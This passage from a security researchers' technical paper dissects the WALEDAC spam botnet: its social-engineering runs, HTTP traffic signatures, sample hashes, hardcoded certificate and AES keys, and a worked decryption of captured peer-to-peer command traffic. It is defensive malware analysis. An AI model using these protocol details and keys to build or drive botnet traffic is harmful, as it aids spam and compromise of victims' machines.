infiltrating waledac botnet's covert operations

IIInnnfffiiillltttrrraaatttiiinnnggg WWWAAALLLEEEDDDAAACCC BBBoootttnnneeettt’’’sss CCCooovvveeerrrttt OOOpppeeerrraaatttiiiooonnnsss

Effective Social Engineering, Encrypted HTTP2P Communications, and Fast-Fluxing Networks

A Technical Paper by: Jonell Baltazar,

Joey Costoya, and

Ryan Flores

The WALEDAC Botnet

INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS: EFFECTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS,

AND FAST-FLUXING NETWORKS

TABLE OF CONTENTS

Introduction........................................................................................................................... 1

Methodology ......................................................................................................................... 2

Social Engineering Techniques Seen ................................................................................. 3

Network Traffic Characteristics........................................................................................... 4

HTTP-BASED P2P COMMUNICATIONS .................................................................................. 5

Technologies Involved .............................................................................................. 6

WALEDAC Binaries.................................................................................................... 6

Deciphering WALEDAC Message Encryption and Encoding................................. 8

Decrypting the Encrypted Registry Blob ............................................................... 17

WALEDAC HTTP2P COMMUNICATION PROTOCOL ............................................................ 18

WALEDAC COMMAND DISTRIBUTION ................................................................................ 25

WALEDAC Botnet Profile ................................................................................................... 28

SIZE OF THE BOTNET ......................................................................................................... 28

WALEDAC PROXIES AND FAST-FLUX NETWORKS.............................................................. 28

SPAM AND DOMAIN INFORMATION ....................................................................................... 29

ROGUE ANTIVIRUS............................................................................................................. 30

Conclusions ........................................................................................................................ 33

Appendix A.......................................................................................................................... 34

WALEDAC SOCIAL ENGINEERING TACTICS........................................................................ 34

Appendix B.......................................................................................................................... 43

SPAMMING ACTIVITY .......................................................................................................... 43

Appendix C.......................................................................................................................... 52

WALEDAC HTTP2P COMMUNICATION PROTOCOL ............................................................ 52

References .......................................................................................................................... 65

Picture Credits .................................................................................................................... 65

The WALEDAC Botnet



INTRODUCTION

The WALEDAC botnet has been involved in an almost continuous spate of spam runs since researchers discovered it in December 2008. Their creators routinely take advantage of various real-world events and occasions, using them as social engineering ploys to trick users into performing certain actions. They leverage various sophisticated tools and technologies to create a formidable network of spam bots. This botnet has the ability to update details such as the subject line and the message body in the spam they send and even has the capability to update versions and communication proxies. This vast umbrella of compromised computers whose owners are often unaware of the misuse of their system resources for malicious distributed-computing activities, thus continuing to expand the botnet’s reach and improves its ability to penetrate additional systems all over the world.

In the course of conducting research for this paper, we have seen WALEDAC’s secret ways and means. It employs a sophisticated communication method and encrypts network traffic using various known technologies. It operates through a moving, changing, and working network of nodes that perform preprogrammed tasks with surprising efficiency. We found the technical capability and scope of this botnet’s operations both too massive and advanced to leave unexamined.

While research on WALEDAC has already been conducted by sudosecure.net, the Honeynet Project, NNL-labs, and the University of Bonn Institute of Computer Science, this paper provides a comprehensive view of the WALEDAC botnet—its activities, methodology, involved technologies, purpose, and business model—in order to paint a picture of the complex and intricate nature of the threats that we see today. Spam is not a mere inbox annoyance anymore but is the first step toward executing more dangerous kinds of system infiltration. Malware are no longer discrete executables but a motley group of related components and files that work together to surreptitiously get inside systems. The technologies malware crime fighters are using are—in some cases—being used against us. The people behind these cybercrimes are no longer fame-seeking script kiddies, they are now professional criminals who have created robust cybercrime businesses.

of 66



METHODOLOGY

To monitor WALEDAC’s activities more closely, we built a malware laboratory that could capture all the spam generated by WALEDAC, along with the botnet’s network traffic status. This monitoring system comprised two virtual machines (VMs) that ran on VMWare Workstation, namely:

» Infect VM: The VM where the WALEDAC bot executes. » Firewall VM: The VM that controls Infect VM’s outgoing traffic, traps spam generated by

WALEDAC, and prevents these from being sent over the Internet. Firewall VM also hosts a Post Office Protocol 3 (POP3) service so we can download and study the spam via an email client.

Packets are being captured inside the host operating system (OS). Figure 1 illustrates how the two VMs’ network connections were set up.

Figure 1. Network connection system used to monitor WALEDAC

We used Thunderbird as the email client to view the spam caught by Firewall VM, which likewise made it easier for us to monitor the messages generated.

Fortunately, WALEDAC does not contain VM-detection codes, making it easier to monitor the botnet without the use of additional hardware.

of 66



SOCIAL ENGINEERING TECHNIQUES SEEN

WALEDAC recently used the Christmas 2008 holidays for its social engineering ploy when we first spotted it. It has changed its social engineering tactic of spamming on holidays and in relation to current economic events seven times. Appendix A chronicles the social engineering techniques we have seen this botnet use throughout its lifetime.

In addition to tricking users to run malware on their computers, WALEDAC also consistently populates inboxes with pharmaceutical (pharma) spam—spam that advertise Viagra, Cialis, and other similar sexual-enhancement drugs. However, there are times when WALEDAC spews out spam that are neither pharmaceutical in nature nor carry other malware. This suggests that it may have been hired by third parties or clients as a spamming service. These regular WALEDAC spam are also documented in detail in Appendix B.

The timeline shown in Figure 2 summarizes the WALEDAC activities seen so far.

Figure 2. Timeline of WALEDAC activities

of 66



NETWORK TRAFFIC CHARACTERISTICS

After months of monitoring, we have verified that WALEDAC’s Hypertext Transfer Protocol (HTTP) network traffic has the following characteristics:

» Uses the word Mozilla when issuing a GET or a POST HTTP request as HTTP Referrer and User Agent at the same time

» Creates an HTTP POST request to a Uniform Resource Locator (URL) that points to a Portable Network Graphics (.PNG) image file

Figure 3. Typical HTTP POST request

» Uses a=<string> and &b=<string> in the majority of its HTTP requests

Figure 4. Message body contained in a=<string> and &b=<string>

of 66



» Uses an X-Request-Kind-Code in its HTTP request header

Figure 5. Presence of an X-Request-Kind-Code HTTP header

whose value can either be a server or a node

HTTP-Based P2P Communications

WALEDAC takes a page out of Storm’s book by implementing a sophisticated communication network. It encrypts its network traffic and utilizes a peer-to-peer (P2P) model, much like Storm did. Although Storm was known for using Overnet P2P communication1, WALEDAC improved this tactic by using an HTTP-based P2P communication network coined as HTTP2P traffic2 by security researchers.

WALEDAC HTTP2P uses a complex variation of known technologies, including Rives-Shamir-Adelman (RSA) and Advanced Encryption Standard (AES) encryption using OpenSSL, an eXtensible Markup Language (XML)-based message structure, bzip2 compression, and Base64 encoding.

1 The Overnet P2P network of Storm was described by Joe Stewart in his Blackhat presentation, “Inside the Storm: Protocols and Encryption of the Storm Botnet” (http://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_ Stewart_Protocols_of_the_Storm.pdf).

2 The term HTTP2P was coined by Shadowserver in a blog entry (http://www.shadowserver.org/wiki/pmwiki.php/Calendar/ 20081231).

of 66



TECHNOLOGIES INVOLVED

WALEDAC uses the following technologies to encrypt communications:

» TiXml: A library used to handle messages using the XML structure. » OpenSSL version 0.9.8e: An open-source library used to encrypt messages sent from a

WALEDAC server to other WALEDAC nodes and vice versa.

» AES: Used to encrypt messages sent to other WALEDAC nodes, along with WALEDAC data stored in an affected system’s registry. WALEDAC specifically uses 128-bit AES encryption.

» RSA: Encryption method other researchers claim WALEDAC is using to encrypt session keys between a server or a node and another node and vice versa (unconfirmed).

» bzip2: Used to compress messages sent to and from WALEDAC nodes, along with data stored in an affected system’s registry.

» Base64: Used to encode messages sent via HTTP (the characters + and / are replaced first before sending the message since they are reserved characters in HTTP).

WALEDAC BINARIES

Since December 2008, WALEDAC has been posting new binaries on its website at an estimated rate of twice a day. In mid-February, however, while the WALEDAC website was donning a Valentine’s theme, the botnet began pushing new binaries even more frequently.

We started monitoring WALEDAC binaries more closely at the beginning of March 2009. A total of 3,568 samples have been collected so far—1,741 in March and 1,827 in April (as of April 24). The highest daily count so far was 120. This was equivalent to one new sample every 12 minutes. The high frequency of sample updates rendered the blacklisting of WALEDAC samples (i.e., antivirus

signatures) less effective in timely blocking all newly published samples.

Figure 6. Daily WALEDAC sample count

The WALEDAC Botnet



We downloaded one of said binaries for analysis. It has the following properties:

MD5: 2586518e10bc853bdcb95b5bf3ab3eb0 SHA1: 618268b1722fbf261f68bc77ee564437f658c115 File Size: 441,345 bytes File name: nocrisis.exe

Unpacking the WALEDAC binary reveals the following hardcoded data:

1. A self-signed certificate

-----BEGIN CERTIFICATE----- MIICxTCCAi6gAwIBAgIJALvFkWML/1R5MA0GCSqGSIb3DQEBBQUAMEwxCzAJBgNVBAYTAkdCMRIwEAYDVQQIEwlCZXJrc2hpcmUxEDAOBgNVBAcTB05ld2J1cnkxFzAVBgNVBAoTDk15IENvbXBhbnkgTHRkMB4XDTA3MTAyMTIwMTE0OFoXDTA3MTEyMDIwMTE0OFowTDELMAkGA1UEBhMCR0IxEjAQBgNVBAgTCUJlcmtzaGlyZTEQMA4GA1UEBxMHTmV3YnVyeTEXMBUGA1UEChMOTXkgQ29tcGFueSBMdGQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJ90+vC7isUhKB8oAzMB/wmE/ypICLU2o1nr8gVlSJC8ZXYBIE1OAziASYadAJtN0Av6KW0su3Dh8GIJy7zJBP+i094w4Yy2B0pjtLr9g2NgnWwFGt/0GjEagemMayf6ADUtKiE3pGG9JrRiKC99TX31AJsjYSM3qsL4Q8lTITLJAgMBAAGjga4wgaswHQYDVR0OBBYEFC9d9isQdTjn6UnsfY0jzn1GM14QMHwGA1UdIwR1MHOAFC9d9isQdTjn6UnsfY0jzn1GM14QoVCkTjBMMQswCQYDVQQGEwJHQjESMBAGA1UECBMJQmVya3NoaXJlMRAwDgYDVQQHEwdOZXdidXJ5MRcwFQYDVQQKEw5NeSBDb21wYW55IEx0ZIIJALvFkWML/1R5MAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADgYEAWYphFm/bi5HP7hmPEGt8j0JfxcvW8P1Wt2XCopO8GiwSOUnRFCCam+PIYZnuTSQMHOfQCjoCD2Ih+jEGu+bOpcHCly/Erd7swHo5WcGhFqpyyiTQt1JjbbDdKRpbzuY1pp1LxfwsoEadUi8wZ8HtIrg5tmd6J1IBkXh9e4z0rvk= -----END CERTIFICATE-----

We used the OpenSSL x509 utility to examine the certificate by issuing the following command:

$ openssl x509 -text -noout -in <path to file containing certificate>

It then displays the following, which reveals that the certificate contains an RSA 1024-bit public key and other information:

Certificate: Data: Version: 3 (0x2) Serial Number: bb:c5:91:63:0b:ff:54:79 Signature Algorithm: sha1WithRSAEncryption Issuer: C=GB, ST=Berkshire, L=Newbury, O=My Company Ltd Validity: Not Before: Oct 21 20:11:48 2007 GMT Not After: Nov 20 20:11:48 2007 GMT Subject: C=GB, ST=Berkshire, L=Newbury, O=My Company Ltd

of 66



Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:9f:74:fa:f0:bb:8a:c5:21:28:1f:28:03:33:01:ff: 09:84:ff:2a:48:08:b5:36:a3:59:eb:f2:05:65:48:90:bc:65:76:01:20:4d:4e: 03:38:80:49:86:9d:00:9b:4d:d0:0b:fa:29:6d:2c:bb:70:e1:f0:62:09:cb:bc: c9:04:ff:a2:d3:de:30:e1:8c:b6:07:4a:63:b4:ba:fd:83:63:60:9d:6c:05:1a: df:f4:1a:31:1a:81:e9:8c:6b:27:fa:00:35:2d:2a:21:37:a4:61:bd:26:b4:62: 28:2f:7d:4d:7d:f5:00:9b:23:61:23:37:aa:c2:f8:43:c9:53:21:32:c9 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Subject Key Identifier: 2F:5D:F6:2B:10:75:38:E7:E9:49:EC:7D:8D: 23:CE:7D:46:33:5E:10 X509v3 Authority Key Identifier: keyid:2F:5D:F6:2B:10:75:38:E7:E9:49:EC: 7D:8D:23:CE:7D:46:33:5E:10DirName:/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd serial:BB:C5:91:63:0B:FF:54:79 X509v3 Basic Constraints: CA:TRUE Signature Algorithm: sha1WithRSAEncryption59:8a:61:16:6f:db:8b:91:cf:ee:19:8f: 10:6b:7c:8f:42:5f:c5:cb:d6:f0:fd:56:b7:65:c2:a2:93:bc:1a:2c:12:39:49:d1:14:20: 9a:9b:e3:c8:61:99:ee:4d:24:0c:1c:e7:d0:0a:3a:02:0f:62:21:fa:31:06:bb:e6:ce:a5: c1:c2:97:2f:c4:ad:de:ec:c0:7a:39:59:c1:a1:16:aa:72:ca:24:d0:b7:52:63:6d:b0:dd: 29:1a:5b:ce:e6:35:a6:9d:4b:c5:fc:2c:a0:46:9d:52:2f:30:67:c1:ed:22:b8:39:b6:67: 7a:27:52:01:91:78:7d:7b:8c:f4:ae:f9

2. Two 128-bit AES keys are hardcoded inside the WALEDAC binary. These keys are used to encrypt its HTTP2P traffic, along with data stored in the registry. The first key is found just before the self-signed certificate mentioned earlier while the second is found beside the first key.

Figure 7. The 128-bit AES keys and certificate found inside the WALEDAC binary

of 66



DECIPHERING WALEDAC MESSAGE ENCRYPTION AND ENCODING

The diagram below shows the general flow of the encryption and encoding of WALEDAC traffic. (Note that some encrypted messages do not follow this flow.)

Figure 8. General WALEDAC encryption and encoding routine

To decrypt and decode the original XML message, reverse the steps described above. The step-by-step decoding and decryption is shown in Figure 9.

Figure 9. General steps in WALEDAC message decoding and decryption

The following is a sample of an encrypted WALEDAC message. This particular transaction shows the first message sent by WALEDAC to another node. The first encrypted message is sent via HTTP POST to a WALEDAC node with the Internet Protocol (IP) address 12.135.152.45.

of 66



POST/oumqnpocgw.htm HTTP/1.1 Referer: Mozilla Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla Host: 12.135.152.45 Content-Length: 957 Cache-Control: no-cache a=_wAAArbl9G7IqhWZ_HDKu0aJe7jwCLHjGrH9DDxgcc7B3Xo4Fx7s6P2h8bqEq0Fqnx-ue2vjJ_nlnvV3 YeJD8s9UPt9deldC538CHLPf1g_ZJFM9-zIe-3GaZWkCkUCwsr93p790F-y5jwZFw7HuA9k5oxiqmzhT08 gifxv6PYafAZOrSYrHGJN7hgueRbsfFxAKi6JBQ6OY2iGgyE7A57j8RWXtL-ThOmZdSRdZfGAoWloENz9 vUr5VPU-qNv7f2IFDkNdlmNukXz1_mGqV61QHY5iZpAhY7R1IgNh40bLSE3HLBrOFtHSHwo2Q3iw2uNC-Rp-C0Wm5iKQr7oqhy5bUKqbYdvFo9IFmL524ohc_Yp_VYYpmYzJ6ea2EhZzrht-L2qchP_L-sKqJhV3l5 xCIUE_MA445oHEln_jvSqyCOQsYfYAREGN6shjacro9A4v0NM1zJId8a30if1ZbOTxm7wCNe8KVDJt_JJJ936bb4HDsXZ580Oz_xf_5mD0nw-OyohwrWoXX8-m3qT24-nOj2wzE5XBRrskgWzNQuJq84TdbVc_leMT7 H-1WW-CywquAqMpHfMKju4fHGbqHNFcwgVU3AHvw1TN1B-MOxvxm3758EitkS91KrCOivsNADyAZPUGKk XKVaY61-o5w9swvRYMsDQC-5dJOh1z-BFp5jKqfmJwQCGB6m2m5T16cN21kE0lvobiIEyprItwIqjKufD qfGmIsVXsmfRDtHk-RAjiTe4NxjRSIfSrBXw5qhGMzvyE7r2tffCGyB4MkDMslNciKgizyjoW3UoSvUDl LN6F4s7SKk90c2nO3FCM9m_ShEHX6sS3rauA7hOYztFMy9UAipegY5rHfGaaEfCQK5sISXmny07LcP-6kX lRB50i7fAZZnQT_mT9kY-vW1NR93nxg_N53c_stcp9YNgOwBsFIOw&b=AAAAAA HTTP/1.1 200 OK Server: nginx/0.6.34 Date: Thu, 19 Mar 2009 09:37:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.2.8 187_wAAARJT21iVma3vUq76l5iKofYMtm6dKE6GNTwIkG8utXnNCgmzqrBh33nYaIYIskVk-OadaTe3mplnt 3CXIkErs-TTeARXl-MBi6vvX-hI3QxNAna1dk9hsehqOz6Hxm8VH26Sw4FqCyMihjASc0AMOPhvzW0SE1Ly4 RY2zbVtf9N6Xy3HzvJJe1EtW72uFGO9QhYEi-j_vwL8pXAZ1FlBvYYvNZFzD7SYYsb61r65Qds8pPGgRWuPL vvs4ljNgnlvh_lzsFlF2ObBDT5DhLLlPZiz_ZGpvFQsieUwA5R3vFyYgs78WIT26GE1FGbppi2PZYcAFX0bjM9Sq6lndqaAUhyggyg6bjdJUjhu2P5zQIAdSYEbGZXZs1ffEMH-e9QFyoI0 POST /jint.htm HTTP/1.1 Referrer: Mozilla Accept: */* Content-Type: application/x-www-form-urlencoded

Follow the steps below to decode and decrypt the WALEDAC messages described earlier to get the original XML message from the first encrypted message sent.

1. Replace the characters - and _ to + and /, respectively, found in the a=<string>. Replace the A characters from the &b=<string> to =. There is a difference between the messages sent and received. The message sent comprises two parts—the string between a= and &b= and the string after &b=. The message received, meanwhile, does not have the a= and &b= parts. The following is a sample message sent to other WALEDAC nodes with a= and &b= highlighted.

of 66



a=_wAAArbl9G7IqhWZ_HDKu0aJe7jwCLHjGrH9DDxgcc7B3Xo4Fx7s6P2h8bqEq0Fqnx-ue2vjJ_nlnvV3Y eJD8s9UPt9deldC538CHLPf1g_ZJFM9-zIe-3GaZWkCkUCwsr93p790F-y5jwZFw7HuA9k5oxiqmzhT08 gifxv6PYafAZOrSYrHGJN7hgueRbsfFxAKi6JBQ6OY2iGgyE7A57j8RWXtL-ThOmZdSRdZfGAoWloENz9vU r5VPU-qNv7f2IFDkNdlmNukXz1_mGqV61QHY5iZpAhY7R1IgNh40bLSE3HLBrOFtHSHwo2Q3iw2uNC-Rp-C 0Wm5iKQr7oqhy5bUKqbYdvFo9IFmL524ohc_Yp_VYYpmYzJ6ea2EhZzrht-L2qchP_L-sKqJhV3l5xCIUE_ MA445oHEln_jvSqyCOQsYfYAREGN6shjacro9A4v0NM1zJId8a30if1ZbOTxm7wCNe8KVDJt_JJJ936bb4HDsXZ580Oz_xf_5mD0nw-OyohwrWoXX8-m3qT24-nOj2wzE5XBRrskgWzNQuJq84TdbVc_leMT7H-1WW-C ywquAqMpHfMKju4fHGbqHNFcwgVU3AHvw1TN1B-MOxvxm3758EitkS91KrCOivsNADyAZPUGKkXKVaY61-o 5w9swvRYMsDQC-5dJOh1z-BFp5jKqfmJwQCGB6m2m5T16cN21kE0lvobiIEyprItwIqjKufDqfGmIsVXsmf RDtHk-RAjiTe4NxjRSIfSrBXw5qhGMzvyE7r2tffCGyB4MkDMslNciKgizyjoW3UoSvUDlLN6F4s7SKk90c 2nO3FCM9m_ShEHX6sS3rauA7hOYztFMy9UAipegY5rHfGaaEfCQK5sISXmny07LcP-6kXlRB50i7fAZZnQT _mT9kY-vW1NR93nxg_N53c_stcp9YNgOwBsFIOw&b=AAAAAA

3. Concatenate the strings found in the a=<string> and in the &b=<string> following Step 1. We now have a Base64-encoded message. The value found in the &b=<string> is used as Base64 padding.

/wAAArbl9G7IqhWZ/HDKu0aJe7jwCLHjGrH9DDxgcc7B3Xo4Fx7s6P2h8bqEq0Fqnx+ue2vjJ/nlnvV3YeJD8s9UPt9deldC538CHLPf1g/ZJFM9+zIe+3GaZWkCkUCwsr93p790F+y5jwZFw7HuA9k5oxiqmzhT08gifxv6PYafAZOrSYrHGJN7hgueRbsfFxAKi6JBQ6OY2iGgyE7A57j8RWXtL+ThOmZdSRdZfGAoWloENz9vUr5VPU+qNv7f2IFDkNdlmNukXz1/mGqV61QHY5iZpAhY7R1IgNh40bLSE3HLBrOFtHSHwo2Q3iw2uNC+Rp+C0Wm5iKQr7oqhy5bUKqbYdvFo9IFmL524ohc/Yp/VYYpmYzJ6ea2EhZzrht+L2qchP/L+sKqJhV3l5xCIUE/MA445oHEln/jvSqyCOQsYfYAREGN6shjacro9A4v0NM1zJId8a30if1ZbOTxm7wCNe8KVDJt/JJJ936bb4HDsXZ580Oz/xf/5mD0nw+OyohwrWoXX8+m3qT24+nOj2wzE5XBRrskgWzNQuJq84TdbVc/leMT7H+1WW+CywquAqMpHfMKju4fHGbqHNFcwgVU3AHvw1TN1B+MOxvxm3758EitkS91KrCOivsNADyAZPUGKkXKVaY61+o5w9swvRYMsDQC+5dJOh1z+BFp5jKqfmJwQCGB6m2m5T16cN21kE0lvobiIEyprItwIqjKufDqfGmIsVXsmfRDtHk+RAjiTe4NxjRSIfSrBXw5qhGMzvyE7r2tffCGyB4MkDMslNciKgizyjoW3UoSvUDlLN6F4s7SKk90c2nO3FCM9m/ShEHX6sS3rauA7hOYztFMy9UAipegY5rHfGaaEfCQK5sISXmny07LcP+6kXlRB50i7fAZZnQT/mT9kY+vW1NR93nxg/N53c/stcp9YNgOwBsFIOw======

4. Base64 decodes the message, the first 5 bytes of which serves as the message header. The first byte of output refers to the command type. In this case, this is 0xff (i.e., the getkey). The next double word (DWORD) highlighted in yellow indicates the final length of data after decryption and decompression (since the resulting decrypted data will be a compressed bzip2 archive). In this case, this is 0x2b6h, which is equal to 694 bytes. The rest of the decoded message is AES encrypted. Note that some encrypted messages do not have 5-byte headers.

of 66



ff000002b6e5f46ec8aa1599fc70cabb46897bb8f008b1e31ab1fd0c3c6071cec1dd7a38171eece8fda1f1ba84ab416a9f1fae7b6be327f9e59ef57761e243f2cf543edf5d7a5742e77f021cb3dfd60fd924533dfb321efb719a6569029140b0b2bf77a7bf7417ecb98f0645c3b1ee03d939a318aa9b3853d3c8227f1bfa3d869f0193ab498ac718937b860b9e45bb1f17100a8ba24143a398da21a0c84ec0e7b8fc4565ed2fe4e13a665d4917597c60285a5a04373f6f52be553d4faa36fedfd8814390d76598dba45f3d7f986a95eb5407639899a40858ed1d4880d878d1b2d21371cb06b385b47487c28d90de2c36b8d0be469f82d169b988a42bee8aa1cb96d42aa6d876f168f481662f9db8a2173f629fd5618a6663327a79ad84859ceb86df8bdaa7213ff2feb0aa89855de5e71088504fcc038e39a071259ff8ef4aac82390b187d801110637ab218da72ba3d038bf434cd7324877c6b7d227f565b393c66ef008d7bc2950c9b7f24927ddfa6dbe070ec5d9e7cd0ecffc5fff9983d27c3e3b2a21c2b5a85d7f3e9b7a93db8fa73a3db0cc4e57051aec9205b3350b89abce1375b55cfe578c4fb1fed565be0b2c2ab80a8ca477cc2a3bb87c719ba87345730815537007bf0d5337507e30ec6fc66dfbe7c122b644bdd4aac23a2bec3400f20193d418a917295698eb5fa8e70f6cc2f45832c0d00bee5d24e875cfe045a798caa9f989c1008607a9b69b94f5e9c376d6413496fa1b888132a6b22dc08aa32ae7c3a9f1a622c557b267d10ed1e4f910238937b83718d14887d2ac15f0e6a846333bf213baf6b5f7c21b20783240ccb2535c88a822cf28e85b75284af50394b37a178b3b48a93dd1cda73b714233d9bf4a11075fab12deb6ae03b84e633b45332f54022a5e818e6b1df19a6847c240ae6c2125e69f2d3b2dc3feea45e5441e748bb7c06599d04ff993f6463ebd6d4d47dde7c60fcde7773fb2d729f583603b006c1483b

5. Decrypt the message using the AES key. The message that should be decrypted must not include the command type and DWORD values mentioned in Step 3. Since this is the first message sent, the AES key is the first key found in the binary. The output is a bzip2-archived data, which can be identified by the first 5 bytes, \x42\x5a\x68\x39\x31 = BZh91.

425a6839314159265359cbc1c4c9000050df802010500affe73ffffff03ffffff040020dbb56392e22829e4d4d3f2a793432869b6a4f43c4a79aa3c9a348f4f527ea9f94d10454f4d11a69e89a9fa988d3d4f534f48f53014c4c8d3c990c91ea08a9e9a1a98134dea6a343234d06869a3401932341a03553f53c9234068d03d234000680686864001e00158ec56d4efda30598875326f8c068ca00d1435c9d3b1c83242569ae78e4eb4072ed4a414c31ea2732cf118ebed39880289a1022d218506a71b06f765bb4b855f9a75896e32aab02d9470be1cf1599e7f38719af1d6ca5bfae962e2acfbf4497999b2e42758a7db58f060622d5ba1d0c3869ece93057851eb9c6c1e4ed977e8ec4105f904a232265dd70ad4ac143cbe6575a25f0c8b98b4c474c6a594912283635fa0e415bf43a03d994696caca482648044b7c1dd6df7032a0f58f95834e37c6e2d24cd9532ab40bc6645f0ca78a7880f0a7e0f30ad134cab77b748e2bb010c86020712df4de0a607bf675cca608d4d07786549c857b670ef1681433652aa3e955ffd30189c43ecd01e4ea4dacbf68e95b30e751d01414d38db966f3033a336b752e73052d854963c4214591f659053db97a87a201b24c406a4392ea4da5808f75e0b067c8e82d139e9831db351c93dcf1690acb39017e1ef88a8b124a1e74a8912df54a865dba45a619d2dddc64b4a4733241d0258cf3c9684718a5af64de27db75f553b9897ade306806fb97b7785990459d24d4a4a1fad006870fd19650aa873a451ad78dc50b675cb40aecf2de5dd5d94eaf01b1531c4d14af77870a28055e8b54b57e785652f191746fec18c1c27a7a99145ae0941c8e05b0d56f16c20a8c301abd91e5d8b7b2d5db2c2508623e038638b85ad6531c3dd433ea36f0d120dfa507662cea15fcfd7e4cff862ccb3707a69e58a07febbecd3ad905630f280217f177245385090cbc1c4c95630f280217f17724538

6. Uncompress the data using bzip2. The result is an XML message with a length of 694 bytes (as mentioned in Step 3). The XML node <t> shows the command, <v> shows the version, shows the identity of the machine that sent the message, and so on. The certificate found inside the WALEDAC binary is likewise included in the XML message.

of 66



<lm> <t>getkey</t> <v>34</v> ab0a762d122d31252c0ba614a6124d23 <r>0</r> <props> -----BEGIN CERTIFICATE----- MIIBvjCCASegAwIBAgIBADANBgkqhkiG9w0BAQQFADAlMQswCQYDVQQGEwJVSzEWMBQGA1UEAxMNT3BlblNTTCBHcm91cDAeFw0wOTAzMTkwOTM2MzdaFw0xMDAzMTkwOTM2MzdaMCUxCzAJBgNVBAYTAlVLMRYwFAYDVQQDEw1PcGVuU1NMIEdyb3VwMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDXQWv+5g4OGu0EstTr/8BA2CEznbC8DfwesFh63p/bfdxy/H8sbJmMNelvT51Npo7S6NaPt9K8b5ht/T88NK8TvHkZehSMwIJUcuWZ6yrMzwFJOrttniJlxkeGjDda1/RZPLVXtNh4d1MO5x0a7Tz4ZsSElyUsWFLwuvXEPkxUIwIDAQABMA0GCSqGSIb3DQEBBAUAA4GBAC/PIph0/UDUCPeCMcCVOPJuagLjbUc3Am3n9ZaYcy4Ay1R+4wjV6p25nvOZxyW+7rVfBtu97MnmhQFhXLtlO+9oTACVfUdRkJ7VnqRgXEyOb7M6P19Gz9o8YnvKdUmmnXTPSh52CIzTEzDY9yBd53YvyYmtTHHGEbWwCZrnIIP5 -----END CERTIFICATE----- </props> </lm>

The first reply is interesting. The steps in decrypting the first message as shown earlier in Steps 1–5 should be done to decrypt it. Note that the message received does not have the a= and &b= parts as shown below.

_wAAARJT21iVma3vUq76l5iKofYMtm6dKE6GNTwIkG8utXnNCgmzqrBh33nYaIYIskVk-OadaTe3mplnt3 CXIkErs-TTeARXl-MBi6vvX-hI3QxNAna1dk9hsehqOz6Hxm8VH26Sw4FqCyMihjASc0AMOPhvzW0SE1Ly4 RY2zbVtf9N6Xy3HzvJJe1EtW72uFGO9QhYEi-j_vwL8pXAZ1FlBvYYvNZFzD7SYYsb61r65Qds8pPGgRWu PLvvs4ljNgnlvh_lzsFlF2ObBDT5DhLLlPZiz_ZGpvFQsieUwA5R3vFyYgs78WIT26GE1FGbppi2PZYcAFX0bjM9Sq6lndqaAUhyggyg6bjdJUjhu2P5zQIAdSYEbGZXZs1ffEMH-e9QFyoI

In this example, the decrypted XML message is:

<lm> <v>34</v> <t>getkey</t> <props> BarssaWhsnVRx7MhcPm3FxzhMyO3sr0DnyMk/n6vPVfjmMGY7lYkO6xoOQpu7BbIZeCzPQ4ATjh/FdGZBqUPVYHpxLDRG3j7C7LRju+y+gAmNF3dY8HGlCJSJVlitKDwKBvZ6jhBKchVU0rKjZ20SE9P+fg+dblQ5T3yiF/2zSg= </props> </lm>

of 66



The node reply contained a Base64-encoded message that contains the new AES key that will decrypt the next message-related transactions. The decoded Base64 message will be:

05aaecb1a5a1b27551c7b32170f9b7171ce13323b7b2bd039f2324fe7eaf3d57e398c198ee56243bac68390a6eec16c865e0b33d0e004e387f15d19906a50f5581e9c4b0d11b78fb0bb2d18eefb2fa0026345ddd63c1c6942252255962b4a0f0281bd9ea384129c855534aca8d9db4484f4ff9f83e75b950e53df2885ff6cd28

The message is encrypted using the RSA public key found in the certificate that is hardcoded in the WALEDAC binary, given that this is the very first transaction of such sort (a new certificate is used in subsequent transactions with other nodes). To get the new AES key in this example, a WALEDAC RSA private key3 should be used to decrypt the message. The private key remained unknown at the time this report was written.

After obtaining the new AES key (from debugging the WALEDAC binary), researchers can now decrypt the next message transactions with other nodes. An example of the second request is shown below.

a=AQAAAIvy5Rd_nXh3Ic1SKyFh38KB3yMlXofSVsUcvklyMeLvltsqvYSy2ggcKjMD7KWzxfqFJlVdWr5dDXtRfUU5mweaea5UqRqD_A74Gyl81PLHUoOCsA7wVMhM78zEwDoKNcl68kkUTKRke2dKa8uhkP9mpPnbAKiFc3NYczEpR1ZZZmhyFX2ZYOgkcXca65zSZgU&b=AAAAAA

When decrypted using the new AES key, the following was obtained:

<lm> <t>first</t><v>34</v> ab0a762d122d31252c0ba614a6124d23<r>0</r> <props>mirabella5.1.2 600</props> </lm>

We also observed that the new AES key used by WALEDAC did not change even after several transactions. The new AES key could still decrypt new message transactions from updated copies of the WALEDAC bot. From our tests, the AES key could also decrypt messages from WALEDAC binary versions 32 and above. We are uncertain if this is true, however, with versions prior to WALEDAC version 32.

3 Discussed by Greg Sinclair of NNL-labs (http://www.nnl-labs.com/cblog/index.php?/archives/7-WALEDACWALEDACs-Communcation-Protocol.html).

of 66



WALEDAC also makes other requests that do not have the 5-byte message header after Base64 decoding. They also do not have the a=<string> and the &b=<string> from this particular HTTP request as shown in the sample message below.

